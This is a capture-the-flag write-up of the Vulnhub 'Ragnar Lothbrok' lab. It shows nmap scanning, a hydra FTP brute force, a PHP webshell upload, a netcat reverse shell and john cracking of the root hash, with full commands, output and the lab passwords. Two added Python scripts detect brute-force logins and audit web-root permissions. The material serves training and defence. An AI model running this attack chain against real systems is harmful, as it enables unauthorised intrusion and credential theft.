Today we are going to hack the Vulnhub machine called
Ragnar Lothbrok. You can download it from the following link:
Ragnar Lothbrok
Enumeration
We start with an nmap scan to see which ports
are open.
> nmap -A -p- 192.168.1.137
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-09 13:07 CET
Nmap scan report for armbjorn (192.168.1.137)
Host is up (0.00087s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
80/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was http://armbjorn/dashboard/
443/tcp open ssl/http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was https://armbjorn/dashboard/
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after: 2010-09-30T09:10:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host 'aVa.home' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.70%I=7%D=12/9%Time=5FD0BDF1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,47,"C\0\0\x01\xffj\x04Host\x20'aVa\.home'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.67 seconds
Of all the open ports, we start by examining the web server
in more detail to see if we find any interesting files.
We see there is a /wordpress directory; when we visit it, we see
that there is a user called ragnar.
We also see that there is a directory called /secret.
After visiting it, it looks like a possible password list.
We download it :)
> wget http://armbjorn/secret -O lista.txt
Knowing that a user called ragnar exists, we brute-force
the FTP service using the list found in /secret as the dictionary and
"ragnar" as the username.
> hydra -l ragnar -P lista.txt 192.168.1.137 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-09 13:07:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4617 login tries (l:1/p:4617), ~289 tries per task
[DATA] attacking ftp://192.168.1.137:21/
[STATUS] 1797.00 tries/min, 1797 tries in 00:01h, 2824 to do in 00:02h, 16 active
[STATUS] 2071.00 tries/min, 4142 tries in 00:02h, 479 to do in 00:01h, 16 active
[21][ftp] host: 192.168.1.137 login: ragnar password: lagertha
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-09 13:09:49
We got the password!
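From the defender's side, a run like the one above (thousands of failed logins for one account in two minutes, then a success) is easy to spot in the FTP server's log. The following Python is an added example, not part of the original write-up: it parses constructed log lines in a simplified ProFTPD-like format (the format, PIDs, timestamps and the second client are assumptions) and flags a source/user pair once it passes a failure threshold inside a sliding window, then reports a later successful login from that pair.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in a simplified ProFTPD-like format (invented for this
# example, not copied from the target). 192.168.1.105 is the attacker's box in
# the write-up; PIDs, timestamps and the 192.168.1.50 client are made up.
def build_sample():
    base = datetime(2020, 12, 9, 13, 7, 27)
    lines = [f"{base + timedelta(seconds=i):%Y-%m-%d %H:%M:%S} armbjorn proftpd[{2101 + i}] "
             f"192.168.1.105: USER ragnar: Login failed" for i in range(15)]
    lines.append("2020-12-09 13:09:49 armbjorn proftpd[2190] 192.168.1.105: USER ragnar: Login successful")
    lines.append("2020-12-09 13:20:01 armbjorn proftpd[2300] 192.168.1.50: USER ragnar: Login failed")
    lines.append("2020-12-09 13:20:05 armbjorn proftpd[2301] 192.168.1.50: USER ragnar: Login successful")
    return lines

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) \S+ proftpd\[\d+\] (?P<ip>[\d.]+): "
                     r"USER (?P<user>\S+): Login (?P<result>failed|successful)$")

def parse(lines):
    """Yield (timestamp, source ip, user, success) for every line that matches."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                   m["ip"], m["user"], m["result"] == "successful")

def detect_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """Flag a (source ip, user) pair once it reaches `threshold` failed logins
    inside a sliding `window`; a later success from a flagged pair is the
    high-fidelity signal that the guessing worked."""
    failures = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    flagged, alerts = set(), []
    for ts, ip, user, ok in parse(lines):
        key = (ip, user)
        if ok:
            if key in flagged:
                alerts.append(("compromise", ip, user, ts))
            continue
        q = failures[key]
        q.append(ts)
        while ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append(("bruteforce", ip, user, ts))
    return alerts

if __name__ == "__main__":
    for kind, ip, user, ts in detect_bruteforce(build_sample()):
        print(f"{ts:%H:%M:%S} {kind:10s} {ip} user={user}")
```

The second client fails twice and then logs in, which stays below the threshold and produces no alert; hydra's run at roughly 1800 tries per minute trips it within seconds.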
We log in to the FTP server.
> ftp 192.168.1.137
Connected to 192.168.1.137.
220 ProFTPD Server (ProFTPD) [::ffff:192.168.1.137]
Name (192.168.1.137:sml): ragnar
331 Password required for ragnar
Password:
230 User ragnar logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 33 33 3607 Aug 27 2019 applications.html
-rwxrwxr-x 1 33 33 177 Aug 27 2019 bitnami.css
drwxrwxr-x 21 33 33 4096 Dec 3 18:16 dashboard
-rwxrwxr-x 1 33 33 30894 May 11 2007 favicon.ico
drwxrwxr-x 2 33 33 4096 Dec 3 18:16 img
-rwxrwxr-x 1 33 33 260 Jul 9 2015 index.php
-rw-rw-r-- 1 33 33 40578 Dec 3 19:00 secret
drwxrwxr-x 2 33 33 4096 Dec 3 18:14 webalizer
drwxrwxrwx 5 33 33 4096 Dec 9 12:02 wordpress
226 Transfer complete
ftp>
From the directory structure and the folders in it, we can
infer that this is the web server's document root...
So we prepare a webshell:
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
5496 bytes sent in 0.00 secs (124.7951 MB/s)
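What made the upload work is visible in the FTP listing itself: an FTP account writing straight into the web root, with a world-writable wordpress directory and writable PHP files. The following Python is an added example, not part of the original write-up: it parses the listing shown above (plus one constructed shell.php entry whose owner uid 1000 is an assumption) and reports the entries a defender would want to fix.

```python
import re
from collections import Counter

# Constructed input: the target's web root as listed over FTP in the write-up,
# plus one entry for the uploaded shell.php with the transferred size. The
# owner uid 1000 and the timestamp of that entry are assumptions.
LISTING = """\
-rwxrwxr-x   1 33   33    3607 Aug 27  2019 applications.html
-rwxrwxr-x   1 33   33     177 Aug 27  2019 bitnami.css
drwxrwxr-x  21 33   33    4096 Dec  3 18:16 dashboard
-rwxrwxr-x   1 33   33   30894 May 11  2007 favicon.ico
drwxrwxr-x   2 33   33    4096 Dec  3 18:16 img
-rwxrwxr-x   1 33   33     260 Jul  9  2015 index.php
-rw-rw-r--   1 33   33   40578 Dec  3 19:00 secret
drwxrwxr-x   2 33   33    4096 Dec  3 18:14 webalizer
drwxrwxrwx   5 33   33    4096 Dec  9 12:02 wordpress
-rw-r--r--   1 1000 1000  5496 Dec  9 12:05 shell.php
"""

# mode, links, uid, gid, size, month, day, year-or-time, name
ENTRY_RE = re.compile(r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<uid>\S+)\s+\S+\s+\d+\s+"
                      r"\S+\s+\d+\s+\S+\s+(?P<name>.+)$")

def parse_listing(text):
    """Return (mode, uid, name) tuples from an ls -l / FTP LIST style listing."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m["mode"], m["uid"], m["name"]))
    return entries

def audit_webroot(text):
    """Report writable directories, writable PHP files and PHP files whose owner
    differs from the rest of the listing. Returns (name, reason) pairs."""
    entries = parse_listing(text)
    if not entries:
        return []
    common_uid = Counter(uid for _, uid, _ in entries).most_common(1)[0][0]
    findings = []
    for mode, uid, name in entries:
        is_dir, group_w, other_w = mode[0] == "d", mode[5] == "w", mode[8] == "w"
        if other_w:
            findings.append((name, "world-writable " + ("directory" if is_dir else "file")))
        if name.endswith(".php") and (group_w or other_w):
            findings.append((name, "PHP file writable by group/other"))
        if name.endswith(".php") and uid != common_uid:
            findings.append((name, f"PHP file owned by uid {uid}, other entries by {common_uid}"))
    return findings

if __name__ == "__main__":
    for name, reason in audit_webroot(LISTING):
        print(f"{name:20s} {reason}")
```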
Once the webshell is uploaded, we start nc listening.
> nc -nlvp 1234
listening on [any] 1234 ...
And we visit http://armbjorn/shell.php.
Low shell
> nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.137] 58860
Linux osboxes 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:11:36 up 17 min, 0 users, load average: 4.95, 5.40, 3.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
Once inside the system, we log in as ragnar with
the password obtained earlier.
daemon@osboxes:/$ su ragnar
Password: lagertha
We see that there is a file called secret.
We look at what it contains.
It looks like the root password :)
We copy it to our system and try to crack it with john.
> john --wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
kevinmitnick (root)
1g 0:00:05:31 DONE (2020-12-09 13:31) 0.003013g/s 2703p/s 2703c/s 2703C/s keya18..kete12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
After cracking the password, we log in as root!
Privilege Escalation
ragnar@osboxes:~$ su root
Password: kevinmitnick
root.txt
root@osboxes:/home/ragnar# cd /root
root@osboxes:~# ls -la
total 56
drwx------ 8 root root 4096 Dec 4 06:43 .
drwxr-xr-x 19 root root 4096 Jul 31 12:34 ..
-rw------- 1 root root 273 Dec 4 06:43 .bash_history
-rw-r--r-- 1 root root 0 Dec 3 14:51 .bashrc
drwx------ 5 root root 4096 Dec 3 14:24 .cache
drwxr-xr-x 5 root root 4096 Dec 3 13:52 .config
drwx------ 3 root root 4096 Dec 3 13:52 .dbus
drwxr-xr-x 2 root root 4096 Dec 3 15:33 Desktop
drwx------ 3 root root 4096 Dec 3 15:33 .gnupg
-rw-r--r-- 1 root root 129 Dec 3 14:22 hello
drwxr-xr-x 3 root root 4096 Dec 3 11:16 .local
-rw------- 1 root root 18 Dec 3 13:02 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 5 Dec 3 14:47 .python_history
-rw-r--r-- 1 root root 66 Dec 3 12:36 .selected_editor
root@osboxes:~# cat hello
Congratulation Have a nice day
I'm very happy
How the little piglets would grunt if they knew how the old boar suffered